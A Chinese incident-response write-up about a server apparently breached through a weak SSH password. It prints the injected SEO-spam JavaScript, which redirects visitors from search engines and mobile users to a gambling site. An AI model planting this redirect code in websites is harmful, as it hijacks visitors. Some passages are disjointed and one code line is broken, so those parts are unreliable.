摘要:客户给出了服务器的账号密码,我们的第一反应是入侵从SSH弱口令开始的。因为我的爆破字典里包含了服务器的密码(手动笑哭),但这显然还不能直接让客户信服。在服务器上输入bt命令进行修改。我们推测攻击者不止一个,并且都是通过SSH弱口令入侵服务器。
近期,我成功参与并妥善处置了一起服务器网络安全事件。本文旨在对该事件的详细过程进行阐述以及经验分享,以期为同行提供参考和借鉴。该事故涉及网站恶意篡改和服务器遭受攻击。接下来,我会就事发背景、攻击路径挖掘、追踪溯源以及应对方案等层面,进行深度分析。
事件起因与发现
作为尊贵的客户首位服务提供者,对于本次网络安全事件,我方深感关切。在察觉到贵公司网站运行异常之后,我司迅速排查并修复了故障,发现源代码遭受恶意篡改,出现诸如异步操作未知来源接口等异常行为。为了确保贵公司的合法权益,我司立即启动应急预案,对服务器进行全面检测,证实存在安全风险。随后,我司立即展开深度调查及妥善处置。
攻击入口推测
根据深度勘察发现,服务器所提供的公共服务与人为攻击特征相符,而攻击方式高度疑似通过SSH弱密码进行的渗透行为。虽然同时运行着宝塔和DedeCMS的相关服务,然而依据过往经验分析,由于宝塔后台路径较为复杂且客户自行设置的账号相对安全,故由此途径实现攻击的机率极小。据此推断,主攻手段为利用SSH弱密码渗透进入服务器。
排查过程与发现
经过对攻击入口的详细核查,我方即刻登陆客户服务器展开全面盘查。面对繁杂的服务器数据,我们仍迅速找到了问题所在——未经授权的用户曾在某个时间点篡改了网站源码,植入了恶意代码。这些操作导致网页Meta信息遭到了更改,并且向不可知的接口发送了异步请求。深入分析表明,这一恶意代码的主要意图是通过黑帽SEO优化手段提升网站排名,同时识别访问者的来源,如果是搜索引擎,就会将其导向特定的网站。
在本次详细检查中,我们注意到了诸多异常情况,例如大量附带于服务器上的隐秘后门文件,某进程的CPU过度使用嫌疑以及可能被恶意挖矿脚本渗透的迹象,另外禁止百度收录代码,我们还检测到了可疑的zxc.php木马文件以及数个代理服务的存在。这些迹象显然表明了黑客的入侵行为。
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script"); //定义一个名为hm的script标签。
hm.src = "https://hm.baidu.com/hm.js?02bccd4ceefc73579f1931885e932bba";//给hm标签的src属性赋值。
var s = document.getElementsByTagName("script")[0]; //获取dom中第一个script标签 并将其赋值给变量s。
s.parentNode.insertBefore(hm, s);//
})();
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
//if函数判断了当前浏览的网址协议是经过SSL加密过的https或者是其他类型的网址,根据不同的类型分别访问了2个JS文件。之后会将访问的JS文件内容生成脚本插入到当前的url页面中,运行该脚本则会读取对应的一个非常小体积的gif图像,在这个过程中将url地址推送到百度中。
(function(){
var src = "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba";
document.write('");
//在页面插入script代码,并赋值src属性,然后请求src的内容https://sjbgw2022.com/tb.js
//这里省略一大段代码,因为代码内容与ly.js内容一致都是对恶意SEO的优化
//上面的代码与之前一样作用就是推送自动收录。
//JS正则表达式判断来路,如果是下列搜索引擎则指定跳转网址。
var regexp=/\.(sogou|soso|baidu|bsb|youdao|lanjie|bing|118114|biso|sm|qq|so|safe|toutiao|biso|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="https://tb04.cc/";//满足就跳转至菠菜页面。
}
//更详细的检测,判断是否包含搜索引擎字段,是则跳转至菠菜页面。
var sp_regexps =
/\.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)\./gi;
var sp_whereis = window.location.referrer;
try {
sp_whereis = top.document.referrer;
} catch (e) {}
try {
sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {
sp_domains = top.document.domain;
} catch (e) {}
try {
sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {
window.location.href = 'https://tb04.cc';
parent.window.opener.location = 'https://tb04.cc';
}
//判断是否是移动端,满足也跳转至菠菜页面。
function browserRedirect() {
var sUserAgent = navigator.userAgent.toLowerCase();
var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';
var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';
var bIsMidp = sUserAgent.match(/midp/i) == 'midp';
var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';
var bIsAndroid = sUserAgent.match(/android/i) == 'android';
var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';
var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';
if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {
} else {
window.location.href = 'https://tb04.cc';
}
}
browserRedirect();
处理措施与反击
面对已识别的安全威胁,我方立即启动多重应对策略。首要行动即是消除所有恶意代码和后门文件,确保服务器的安全无虞。此外,我们还加强了服务器的安全防护水平,包括调整SSH密钥并增强宝塔及DedeCMS等服务的安全设置。为了防止类似问题再次出现,我们对服务器进行了全面加固及监控。
在落实防护措施基础上,我们立刻展开了迅猛反击。根据攻击者的行为特征,我们立即向相关安全机构报告此事,以期获得深度调查与妥善处置。此外,我们充分调动内部资源,对广大用户开展全面的安全教育,着重强调加强密码设定以及定期检查服务器安全性的必要性。
总结与展望
本次安全事件使我们深刻理解了服务器安全性的重要性和网络黑客攻击策略的多样化。因此,今后的业务发展中,我们会全面提升服务器防护措施,并定期进行系统安全审查和漏洞修复,以保障用户信息的保密性和公司网站的平稳运行。
问题与展望
在本次安全事故处理期间,我们遇到了诸如对攻击源头追踪的难度较大和客户安全意识亟待加强等问题。为了提升我们的防护水平并应对类似突发情况,我们期待引入更多尖端科技工具以及优秀的合作伙伴。
在此禁止百度收录代码,呼吁各界共同关注网络安全议题,积极采取措施,提高安全意识,携手打造绿色健康的网络环境。